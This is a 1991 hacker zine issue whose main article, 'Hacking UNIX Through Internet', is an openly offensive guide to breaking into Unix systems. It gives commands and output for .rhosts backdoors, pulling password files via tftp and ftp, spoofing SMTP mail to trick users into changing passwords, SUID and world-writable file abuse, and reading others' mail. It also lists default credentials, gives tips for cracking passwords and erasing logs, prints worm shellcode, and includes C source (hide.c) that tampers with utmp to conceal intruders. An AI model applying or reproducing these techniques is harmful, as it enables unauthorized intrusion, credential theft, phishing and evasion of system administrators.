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Volume 2, Issue 01 ---------------------------------- Thursday August 29, 1991 
   Legions of Lucifer - Phone Hackers United to Crash & Kill  < LoL-Phuck > 
                LoL-Phuck, Inc. /  Issue Number 2.01  08.29.1991 
            (C)Copr 1990,91 Cypher Productions - All rights reserved. 
      Legions of Lucifer founded on January 20, 1990 by: Digitone Cypher 
      PHUCK, INC. Founded in 1986 by: Tripin Face  (aka Cobra Commander) 
Legions of Lucifer merged with PHUCK, INC on January 15, 1991 at 11:41pm PST! 
(That is the same day the Persian Gulf War started [Operation Desert Storm]) 
We are now: LoL-Phuck 
Note:    Any and all information found in this production is not to be used or 
intended to  be released to  due any harm to anyone.   This is mearly for 100% 
informational purposes only and neither writers, staff members, submitters nor 
anyone else that  has anything  to do with this released  issue should be held 
resonsible for  the deeds and misgivings that intentional may readers preform. 
                    All text file submissions should go to: 
                West Coast Technologies, Inc. @ +1-213-274-1333 
           (Use the guest account; User Name: GUEST  Password: GUEST) 
  Okay basically, I am proud to say that LoL-Phuck is back from the "DEAD" 
  to bring you finally good quality reading material. I am going to tell 
  you guys right now, that we will not be producing that many text files, 
  we will just release when we feel like it, and not on a monthly kind 
  of basis. We are infact looking for writers, so if you do want to apply, 
  you can find it in this text file where to. This certain file, is a joint 
  release between SHA (a Swedish Hacking Group) and LoL-Phuck, so I hope 
  you all like it... I would also, like to note that starting from this 
  text file, LoL-Phuck will be totally different, this is the NEW and very 
  IMPROVED Legions of Lucifer-Phuck. Watch for the hot text files and 
  releases we will be producing in the months to come.. 
  Starting on November 2, 1991 "West Coast Technologies, Inc" will be changing 
  area codes from 213 to 310. There will be a 6-Month period from November 2, 
  1991 to May 2, 1992, when both the new and the old ways of completing the 
  calls to this number (274-1333) will work. Beginning May 2, 1992, calls 
  dialed to the incorrect area code (213) will not be completed. You will 
  reach a recording explaining the new dialing procedures and you will need to 
  re-dial using the correct area code (310). 
  ...Also, as you all know by now, there is a text file called "LOL-21.TXT" 
  which was supposedly written by me, that is like a "Sexual Biography", I 
  am going to state for the record that I *DID NOT* write that trash. Now, 
  The next official issue will be "LOL-022.TXT" since #21 has been taken by 
  the bogus text file, and we wouldn't want them to get confused now would 
  we? This kinda of thing has happened before, I believe it was Issue #9, 
  some jokers did the same prank, so I know how to handle it. Anyways, I 
  would like to thank the rest of you for all your support. 
                                    Digitone Cypher 
                                  LoL-Phuck President 
  I may be contacted at the following internet addresses: 
  UUCP: {hplabs!hp-sdd ucsd nosc}!crash!pnet01!dcypher 
  ARPA: crash!pnet01!dcypher@nosc.mil 
  INET: dcypher@pnet01.cts.com 
----------------------[ Hacking UNIX Through Internet! ]---------------------- 
Written by: Mr Big <SHA>               Release Date: Thursday August 29, 1991 
Editied by: Digitone Cypher            Release Numb: 20th Issue 
  This file is released in a joint venture with Swedish Hackers Association 
  in Sweden. 
  Note: S.H.A. are not members of LoL-Phuck, nor are LoL-Phuck members 
        of S.H.A., both groups are separate to each other, this is a only 
        a exchange in knowledge and assistance. 
  Legions of Lucifer-Phuck is always looking for submissions of text files 
  from small groups and from solo writers for worldwide distribution. 
  We are also look for Distribution Sites and full/half-time writers. I 
  can be contacted at the LoL-Phuck HQ @ 213/274+1333... thank you. 
                               - Introduction - 
  I decided to write this file since I feel that there are no complete 
  files about hacking unix systems. Many files only cover some small part 
  in the art of hacking unix, and they don't cover hacking through 
  Internet where aprox. 80% of all hacking takes place. I will not state 
  that this file isn't complete either, since I have, on purpose, left out 
  many things, i.e. bugs in programs that might be exploited, as the Internet 
  Worm did. The reason I did this is because they will not be up-to-date for 
  very long, even though some sites don't install all patches that are 
  released. A good source for all these bugs are comp.unix.wizard, 
  comp.unix.source and other newsgroups. 
  This file isn't supposed to be for the beginner, so not everything in this 
  file is explained in detail. YOU should have common knowledge of unix and 
  /Mr Big - S.H.A. 
 ---------------------------[ Internet Section ]----------------------------- 
                                 - Internet - 
  In the beginning a US Goverment network existed nationwide. When it 
  grew larger the network where split into two networks, one research- 
  (Arpanet) and one millitary network (Milnet). Later thousands of other 
  networks worldwide where also connected and then Internet was born. 
  Internet is a good way of hacking unix systems. There are more than 
  ten thousand computer systems connected to Internet worldwide, running 
  diffrent OS's, but Unix's are the major one used. You are also able to reach 
  other networks or domains through Internet as ARPA network, NASA or the NSA 
  network among others since they are part of the Internet. 
  Approxitly 80% of all hacking take part on Internet. So be aware of 
  that goverment agencies are watching known hacking sites and other sources 
  for hackers. 
  There are also many outdials connected to Internet worldwide that can 
  be used for free calls, but this file isn't about that. Maybe I will compile 
  my list of outdials some day and release it, but that is in the future. 
  How do I get connected to Internet? Well, find you local dialup or go 
  through some University, since most of them are connected to Internet. 
  You can use the MIT Dialup if you don't have anything else: 
            MIT LCS Network Dialup                  (617) 258-7111 
  (I'm sorry that I can't supply you with a whole list of dialups, but 
   since I'm from Sweden, I don't have the needs for US Dialups.) 
  WARNING: Even if Internet seems to be untraceable, they can easily find 
           out where you are hacking from. It's a bit harder if you 
           use gateways before hacking, and don't use your own account 
           unless you want to be in deep shit! 
                                   - IRC - 
  Internet Relay Chat or IRC for short, is a worldwide multi-chat system 
  where users can exchange and discuss stuff real-time with the rest of the 
  world. IRC has many channels you can use - both public, private and hidden. 
  There are many users using this and you can easily get help and information 
  this way, since many people out there knows what they are doing. 
  Be aware that goverment agencies, like NCSA, might be tapping the public 
  forums and users using them, atleast I would... 
  Use this IRC server if you don't have anything else: 
               bradenville.andrew.cmu.edu             ( 
                                 - Outdials - 
  There are also outdials on Internet that you can use. I will not include 
  a list of those, since I know if they are abused, they will go down. You 
  have to do your own search for them. 
                                  - Telnet - 
  Telnet is more or less equal to Internet. With Telnet you can access other 
  systems on the Internet by entering the IP number or the same address of 
  the computer. 
  This is the most common way of connecting to other systems, even if there 
  are other ways too... i.e. rlogin among others... 
  #telnet [HOST] [PORT] 
  Where HOST is the IP address or the name of the computer, and PORT is the 
  port to connect to at the remote site. 
  The port number range from 0-9999. Ports 0-255 are standard ports and well 
  defined in unix. Ports 256-1023 are well known ports. Ports 1024-4999 are 
  user defined ports. Ports from 5000 and upward are nondefined ports. 
  Here are a small list of common port numbers and what they do: 
  21   FTP           _ File Transfer Protocoll 
  25   SMTP          - Or Simple Mail Transfer Protocol. 
  79   Finger        - Reports information of users on remote system. 
                                   - Ftp - 
  File Transfer Protocol or FTP for short is a powerful way to send and 
  receive files between Internet connected hosts. 
  Many sites have set up their systems for anonymous ftp. They have done 
  this since they want everyone to be able to get files and information 
  without having a password. You should respect the ftp hours that are 
  common, i.e. do NOT ftp at local business times, since these systems 
  are used in companys, and work most of the time, and if you use ftp during 
  these hours, they might close the opportunity for us to use ftp, and I 
  would hate it if that happend. 
  #ftp [HOST] 
  Where HOST are the IP address or the name of the computer. 
                                  - Usenet - 
  Some people say that Usenet is the world larges BBS around, and in some 
  sense they are right. Usenet consists of over 1000 forums for various 
  topics, with hundreds of thosands of users worldwide using it. 
  Many good forums for Unix information exists, i.e. 
  To use Usenet news just type: 
  #rn                                 <- This command might vary from 
                                         system to system. 
                                   - CERT - 
  CERT or Computer Emergency Respons Team is an organization which main 
  purpose are to help and prevent unautorized access to computer systems. 
  They publish bug fixes for security holes in diffrent OS's, mainly in 
  comp.security.announce. They also have their own site and support for 
  anonymous ftp so you can directly ftp bug fixes from them or tools that 
  helps system administrators to check the security on their own systems. 
  One good system administration tool for checking the security on your own 
  system are COPS, even if it dosen't detect all bugs that exists. 
  System Managers: If you think you have a compromised system, I suggest that 
                   you contact CERT for assistance. 
  The Internet address for CERT is: 
               cert.sei.cmu.edu                    ( 
 ------------------------------[ Unix Section ]------------------------------- 
                              - Attacking target - 
  Well... first we need an account on a remote system.. How do we get it? 
  There are no easy ways for this, unless your system is trusted. 
  It isn't easy even if your system is trusted, but it is easier :-) 
                                  - .rhosts - 
  Check out your own and other users .rhosts files. 
  These files contains those machines and users that are trusted to log into 
  the account, in which home group it resist, without any password. 
  Note: You must use rlogin to use this feature. 
  #cat .rhosts 
  albert guest 
  gnu.ai.mit.edu + 
  The plus (+) sign indicates that all users on gnu.ai.mit.edu are trusted to 
  use this account without a password, and hopefully this user can log in on 
  the same account on gnu.ai.mit.edu whithout a password. 
  Note: You can set "+ +" to allow anyone anywhere to use the account, 
        but be aware of that if the user dosen't have to enter his own 
        password, he WILL contact the system administrators at his site. 
  To scan all users .rhosts files use the following: 
  #find / -name .rhosts -exec /bin/cat {} ";" 
  If you stumble in on an account, then I suggest you add one entry to 
  the .rhosts file to include the hostaddress of a system that allows guest 
  users, and a plus sign (+). By doing this you don't have to create a shell 
  with suid that can be discovered and you don't even have to hack another 
  account to use the one you stumbled on. 
  Remeber that the user or root must own the .rhosts file on many newer 
  systems, i.e. Sun OS 4.x. 
                             - /etc/hosts.equiv - 
   /etc/hosts.equiv contains system wide trusted remote sites. 
   #cat /etc/hosts.equiv 
   If /etc/hosts.equiv contains a plus sign (+) then all hosts are trusted. 
   Many Sun system are deliverd with /etc/hosts.equiv set up this way. 
                                  - finger - 
  You can also always try to get some accounts on a remote site by using 
  "finger @remotesite" and then guessing passwords... 
  You can even try "finger user@remotesite", where user is a possible user 
  on the remote site, i.e. guest to see if they have a guest account. 
                                  - tftp - 
  Some systems running tftp - Trivial FTP, have a bug allowing you 
  to copy files that contain slashes, normaly tftp impose the security 
  that the file must be world readable, but since /etc/passwd are 
  world readable, try this: 
  #tftp remotesite 
  tftp> get /etc/passwd                         <- Try snatching /etc/passwd 
  Recieved 30216 bytes in 32 seconds. 
  tftp> quit 
  Note: Even if you are not physicaly are logged in at the remote host, 
        this action is stored in the log files on the remote system. 
                                   - ftp - 
  Some systems running anonymous ftp and are not correctly setup might 
  allow any user to move above their restricted (root) directory, and 
  then access all files on the system. 
  #ftp remotesite 
  Connected to remotesite. 
  220 remotesite FTP server (Version 5.59 Mon Oct 29 15:33:08 EET 1990) ready. 
  Name (remotesite:root): anonymous                <- Login as anonymous 
  331 Guest login ok, send your login name as password. 
  Password:                                        <- Anything is ok 
  230- Guest login ok, access restrictions apply. 
  ftp> cdup                                        <- The magic one! 
  250 CWD command successful. 
  ftp> get /etc/passwd /dev/tty                    <- Retreive /etc/passwd 
  200 PORT command successful. 
  150 Opening ASCII mode data connection for passwd (56 bytes). 
  226 Transfer complete. 
  local: /dev/tty remote: passwd 
  56 bytes received in 7e-06 seconds (1.1e+04 Kbytes/s) 
  ftp> quit 
  221 Goodbye. 
                                 - sendmail - 
  The Internet Worm exploited a debug mode in the original sendmail to 
  coax sendmail into creating and executing a program that copied the 
  rest of the Internet worm over to the target host. 
  Note: Almost every system have been patched against this. 
  #telnet remotesite 25 
  Escape character is '^]'. 
  220 s350.  Sendmail 4-0/SMI-4-0 ready at Wed, 10 Jan 91 15:35:01 
  debug                                          <- Try debug command 
  200 Debug set 
  Connection closed by foreign host 
                                   - smtp - 
  By connection to the smtp daemon on the remote site, you are able to send 
  mail under any user identity, to any user on any system. 
  If we want to try to fool a user on a system to change his password, 
  (not likely he will be fooled), but we can easily do this, 
  i.e. We want to send mail from root@tycho.ncsc.mil to john@gnu.mit.edu 
  #telnet tycho.ncsc.mil 25 
  Connected to tycho.ncsc.mil. 
  Escape character is '^]'. 
  220 tycho.ncsc.mil.  Sendmail 4-0/SMI-4-0 ready at Wed, 10 Jan 91 15:35:01 
  rcpt to: john@gnu.mit.edu                <- Receiving user 
  250 john... Recipient ok 
  mail from: root@tycho.ncsc.mil           <- Fake user 
  250 example... Sender ok 
  data                                     <- Instruct SMTP to receive data 
  354 Enter mail, end with "." on a line by itself 
  We are testing new equipment and you are instructed to change your password 
  to john as soon as you receive this message. 
  .                                        <- End mail 
  250 Mail accepted 
  quit                                     <- Now disconnect from system 
  Connection closed. 
                              - Raise you privs - 
  Many users talk about getting root access... It's nice but not necessary 
  to have. The Internet worm didn't exploit root privs if it had it and 
  it managed to hit many remote sites anyway. 
  If you need root or not depends on what you want to do with the system. 
                                - System files - 
  Check out if you have read/write access to the following files: 
  #ls -l /dev/mem 
  crwxrw-rw-  root  /dev/mem            <- General physical memory 
  #strings - /dev/mem                   <- Use this to get strings 
                                           from memory to use 
  #ls -l /dev/kmem 
  crwxrw-rw-  root  /dev/kmem           <- Kernal memory 
  Kernal memory contains among other things.. psid table - Process ID table. 
  I will not support any C program allowing changes to pid's in kernal memory 
  since if someone doesn't know how to use it, then the whole system will 
  crash! and we don't support that kind of action. 
  #ls -l /etc/inittab                   <- Sys V startup file 
  #ls -l /etc/rc*                       <- BSD startup file 
  -rw-rw-rw-  root  /etc/inittab 
  -rw-rw-rw-  root  /etc/rc             <- Standard unix commands 
  -rw-rw-rw-  root  /etc/rc.host        <- running with root privs 
  -rw-rw-rw-  root  /etc/rc.local       <- #ex /etc/rc 
  #ls -l /etc/inetd.conf                <- Sys V demon configuration file 
  #ls -l /usr/etc/inetd.conf            <- BSD demon configuration file 
  -rw-rw-rw-  root  /etc/inetd.conf     <- After editing use #kill -1 initd 
  -rw-rw-rw-  root  /usr/etc/inetd.conf <- After editing use #kill -1 initd 
  #ls -l /etc/utmp                      <- Contains only who information 
  -rw-rw-rw-  root  /etc/utmp           <- Used to hide your session 
                                           or to change your usernamne 
                                           Check out the included source 
                                           (hide.c) that does this. 
                                           You can even read other users mail. 
  #ls -l /usr/spool/cron/crontabs       <- Sys V cron shell scripts 
  #ls -l /usr/spool/cron                <- Older unix systems 
  -rw-rw-rw-  root   /usr/spool/cron/crontabs 
  -rw-rw-rw-  root   /etc/spool/cron 
  Check also local written system scripts that runs as root and other 
  important system files. 
                             - System directorys - 
  Check to see if you have write privs to any important system directory. 
  To find writeable directories use: 
  #find / -type d -perm -2 -print 
  If you have write priv's to a directory but not to a file in the directory 
  you can still copy the file over to another directory, modify it and 
  copy it back. 
  #cp /home/admin/.rhosts /home/mydir/newrhosts 
  #ex /home/mydir/newrhosts 
  #rm /home/admin/.rhosts 
  #mv /home/mydir/newrhosts /home/admin/.rhosts 
  #cat /bin/sh > /home/admin/shell 
  To find writeable files use: 
  #find / -type f -perm -2 -file {} ";" 
  Try modifying startup files for users, 
  Note: The System Administrators might check to see if these files have 
        been changed and then they check them to see if there was a backdoor 
        installed or not. 
                                 - UID files - 
  I neat way of gaining better access is to search for files that 
  have the UID bit set and then if they are writeable, copy /bin/sh over 
  to the file to gain the privileges of the owner of the file. 
  #find / -perm -4000 -exec /bin/ls -lad {} ";" 
                                   - mbox - 
  Reading other peoples mailboxs might give you a clue to their password. 
  They might even have posted it to a friend on the system. 
  Note: Reading other peoples electronic mail is a serious crime. 
  #find / -name mbox -exec /bin/cat {} ";" 
                                 - fingerd - 
  The Internet worm exploitet a bug in the old fingerd program. The program 
  used an obsolete C function called gets(). gets() copies input into 
  a string, but doesn't count the number of characters copied. The old 
  fingerd declaired a 512-byte buffer as an automatic variable, which placed 
  this buffer on the stack. The Internet worm sent down 536 characters, 
  overflowing the buffer, adding some code, and modified the return address, 
  so that fingerd executed a Bourne shell instead of returning. This flaw 
  was used only for VAX running BSD unix. 
  VAX assembly-language code used: 
  nop                          400 nop's 
  pushl $68732f                store '/sh[null]' on stack 
  pushl $6e69622f              store '/bin' on stack 
  movl  sp,r10                 save stack pointer in r10 
  pushl $0                     store 0 on stack (arg 3) 
  pushl $0                     store 0 on stack (arg 2) 
  pushl r10                    store string adress on stack (arg 1) 
  pushl $3                     store argument count on stack 
  movl  sp,ap                  set argument pointer to stack 
  chmk  $3b                    system call to execve 
                            - Brute force hacking - 
  You can allways get a copy of /etc/passwd and then run it with a 
  unix matcher guessing passwords. There are many programs around, 
  so I think I'm wasting my time if I include one. This is the standard way 
  of getting other accounts.. but it's hard to match root account password. 
  If you wan't root access you have to use some other technique, 
  but if you are satisfied with some user accounts, this is the best way. 
  Be adviced that many new systems have passwords from 6-8 characters with 
  a minimum of one non-alphabetical character, or they are running C2 
  standard with shadow /etc/passwd, i.e. you can only see account names 
  in /etc/passwd and not the encrypted password, i.e. 
  #cat /etc/passwd                                 <- Featuring C2 standard 
  root:*:0:0:Super-User:/:/bin/sh                  <- You can see that they 
  guest:*:3169:30:Guest User:/home/guest:/bin/rsh  <- Have shadowing passwd 
  +::0:0:::                                           file since the password 
                                                      field contains '*'. 
  You can always try to get accounts without password: 
  #grep :: /etc/passwd 
  Note: Many system administrators will have their eyes open for users who 
        use A LOT of cpu time... so I suggest that you get yourself a password 
        cracker for your own computer at home, and run your matching sessions 
        there, even if it's slower. 
                                  - Hiding - 
  Since hacking is illegal you might want to hide from the System Manager 
  at the site you are attacking. Please note that they often pay special 
  attention to users using a big per cent of the cpu time (like when matching 
  passwords). Also try to keep the number of files in your directory low, 
  or atleast try to only store smaller files, anything to not draw 
  attention to you. 
  Change users frequently so if the system managers notice you they hopefully 
  do not get any evidence against you. 
  Check system files to see if they have been patch audit your access to them. 
                                 - /etc/utmp - 
  If you have write permissions to /etc/utmp you can easily remove 
  yourself to show up on "who" listings, or even change your username. 
  Check out the included C source for this, Hide.c. 
  You can also read other users mail if you can alter /etc/utmp. 
                                   - getty - 
  Try running /etc/getty or /usr/etc/getty and login again. 
  With this way you will hide from where you are calling from, i.e. your host 
  address won't show up on "who" listnings. 
                              - running programs - 
  If you use any program that you shouldn't i.e. running passsword 
  matching programs, then I suggest that you first rename the program to some 
  appropiate, i.e. 
  #mv matcher emacs 
  #mv passwd user 
  #mv password magazine 
  Then use the program: 
  #emacs user magazine 
  Or you simply change your source code to always use one file as the passwd 
  file and another one for the dictionary. 
                              - /usr/spool/mail/ - 
  There are times when you should edit users mail. If you are editing a file 
  and then kill the process, it will post mail to your user stating that 
  the process was aborted and that you can recover your file with a command. 
  If the real user sees this, he might talk to the system administrators 
  about it, and then they will start to investigate the account without 
  your knowledge, and some day.... shit happends! 
                                 - /etc/wtmp - 
  If you have root access you might want to remove your trails from the 
  system log file, /etc/wtmp, so they won't notice that you are fooling 
  around with their system. 
                                  - Modems - 
  Many people hack just to lower their phonebills. Many unix systems has 
  outgoing modem lines. You can use them if you have the right privileges. 
  Try using the command cu - Call Unix: 
  #cu 3143818460                                <- Yeah! This number works... 
                             - Standard accounts - 
  There are many standard accounts you can try hacking and some common too. 
  Even if the system administrators are more aware of these holes, they still 
  exists, and may be worth trying. Use the included list of standard and 
  successful accounts. 
  Login:          Password:                  Login:          Password: 
  adm             adm                        admin           admin 
  altos           altos                      batch           batch 
  bin             bin                        daemon          daemon 
  date            date                       demo            demo 
  field           service                    games           games 
  general         general                    guest           guest 
  help            help                       ingres          ingres 
  learn           learn                      lp              lp 
  lpadmin         lpadmin                    nuucp           nuucp 
  pub             pub                        public          public 
  rje             rje                        root            root 
  standard        standard                   student         student 
  sync            sync                       sys             sys 
  sysadm          sysadm                     test            test 
  time            time                       tty             tty 
  unix            unix                       user            user 
  uucp            uucp                       uuhost          uuhost 
  who             who 
                              - Finding targets - 
  This is the hard part if you don't know so much about Internet. 
  I will not go further into this, because if everyone starts to use 
  the techniques I have, it will be abused and then we might not have many 
  systems that will be reachable through Internet. And we don't want 
  that to happen, so you have to figure this out for yourself. If this 
  sounds a bit on the selfish side, I truely regret it, but its for your 
  own good. 
                             - Crashing a system - 
  If you do crash a system on purpose, I hope you get caught and that 
  you have to rot in prison for a long long time... 
  Even if you stumble in on a root account and think that they are 
  lamers who are in charge of the system, you NEVER trash the system 
  on purpose! 
  Never crash a system on purpose! 
  Never delete files that you haven't created! 
  Never remove personal mail to people on the system! 
                            - Voice of the Author - 
  I have been working with this for some time now. Even if I don't really 
  feel that this is complete, I have desided to release it as it is, 
  (then I can write a follow up to this... <grin>), and hopefully you 
  will enjoy it anyway. 
  I will release some Internet/Unix hacking utilities in the near future, 
  including backdoors and other nice programs you might need. 
  If you need to contact me or S.H.A. you can send mail to me on the 
  following networks: 
  FidoNet  : 2:201/610 username mrbig 
  Internet : mrbig@DARKSIDE.COM 
                                   - Hide - 
  Speacial thanx to Nimh of Stealth Hackers who wrote this program and for 
  letting me include it in this release. Thanx! 
  Hide will let you remove yourself from /etc/utmp or change the information 
  for you in /etc/utmp, i.e. username, host address or tty. 
  Note: /etc/utmp must be writeable by world. 
 <----CUT HERE-------CUT HERE-------CUT HERE-------CUT HERE------CUT HERE----> 
#include <stdio.h> 
#include <stdlib.h> 
#include <utmp.h> 
#include <pwd.h> 
#define UTMPFILE        "/etc/utmp" 
        FILE    *utmpfile; 
        char    *utmp_tmp[10240]; 
main (argc, argv) 
        int     argc; 
        char    *argv[]; 
        struct  utmp    *user_slot; 
        struct  passwd  *pwd; 
        char    line[10], name[10], host[20]; 
        int     index; 
        printf ("Welcome to HIDE !        FORMAT:  hide [-i]\n\n"); 
        utmpfile = fopen (UTMPFILE, "r+"); 
        if (utmpfile == NULL) 
                printf ("ERROR while opening utmp file... exiting...\n"); 
                exit (); 
        index = ttyslot();                                              /* Get this users utmp index */ 
        index *= sizeof(struct utmp);   /* 36 */ 
        fseek(utmpfile, index, 0); 
/****  Get real UID  ****/ 
        pwd = getpwuid (getuid()); 
        if (pwd == NULL) 
                printf ("Who the hell are you???"); 
        printf ("Real user identity:\n"); 
        printf ("NAME  %s\n", pwd->pw_name); 
        printf (" UID  %d\n", pwd->pw_uid); 
        printf (" GID  %d\n\n", pwd->pw_gid); 
/****  If ARG1 = "-i" then disappear from utmp  ****/ 
        if ( (argc>1) && (!strcmp(argv[1], "-i")) ) 
        index+=8;       /* Rel PNT name */ 
        fseek(utmpfile, index, 0); 
        fwrite ("\000", 8, 1, utmpfile);        /* NO NAME */ 
        fwrite ("\000", 8, 1, utmpfile);        /* NO HOST */ 
        printf ("Removed from utmp\n"); 
/****  Change utmp data  ****/ 
        printf ("Enter new data or return for default:\n"); 
        fseek(utmpfile, index, 0);      /* Reset file PNT */ 
        fread(line, 8, 1, utmpfile);    line[8]=NULL; 
        fread(name, 8, 1, utmpfile);    name[8]=NULL; 
        fread(host, 16, 1, utmpfile);   host[16]=NULL; 
        fseek(utmpfile, index, 0);      /* Reset file PNT */ 
        dinput (" TTY  [%s]%s", line, 8); 
        dinput ("NAME  [%s]%s", name, 8); 
        dinput ("HOST  [%s]%s", host, 16); 
/* Data input */ 
dinput (prompt, string, size) 
        char    *prompt; 
        char    *string; 
        int     size; 
        char    input[80]; 
        char    *stat; 
        char    space[] = "                              "; 
        space[20-strlen(string)] = '\000'; 
        printf (prompt, string, space); 
        stat = gets (input); 
        if (strlen(input) > 0) 
                fwrite (input, size, 1, utmpfile); 
                fseek (utmpfile, size, 1); 
 <----CUT HERE-------CUT HERE-------CUT HERE-------CUT HERE------CUT HERE----> 
    ##      #######  ##            ######  ##   ##  ##   ##  ######   ##  ## 
   ##      ##   ##  ##     ####   ##  ##  #######  ##   ##  ##       ## ## 
  ##      ##   ##  ##            ######  ##   ##  ##   ##  ##       ##### 
 ######  #######  #######       ##      ##   ##  #######  #######  ##   ## 
     (L)egions (o) (L)ucifer - (P)hone (H)ackers (U)nited (C)rash (K)ill 
Call these LoL-Phuck support boards for information or application 
The Disconnected System        602/997+9918  Arizona         NSA Dist Site 
West Coast Technologies, Inc.  213/274+1333  California      AfterShock Beta 
The Magical Mystery Board      203/TMP+DOWN  Connecticut     THG Dist Site 
Blitzkrieg BBS <Node 1>        502/499+8933  Kentucky        TAP Magazine HQ 
Blitzkrieg BBS <Node 2>        502/491+5198  Kentucky        TAP Magazine HQ 
Free Speech BBS                618/457+3365  Illinois        PHRACK Classic HQ 
Gonzo's Gabanza                513/890+0655  Ohio            CHUD Dite Site 
Interpol II                  +46-8-PR-IVAT  Sweden           SHA HQ 
Legions of Lucifer-Phuck High Office Staff Member 
Prezident of [L.o.L]       : Digitone Cypher 
Prezident of [Phuck]       : Tripin Face (aka Cobra Commander) 
Out of US Representatives  : Mr Big          -=-  Sweden 
    Legions of Lucifer - Phone Hackers United to Crash & Kill  < LoL-Phuck > 
            LoL-Phuck, Inc. / Issue Number 2.01  08.29.1991 Complete 
           (C)Copr 1990,91 Cypher Productions - All rights reserved. 
                     All text file submissions should go to: 
                 West Coast Technologies, Inc. @ +1-213-274-1333 
           (Use the guest account; User Name: GUEST  Password: GUEST) 
              - Digitone Cypher (Main Editor/Layout/President) 
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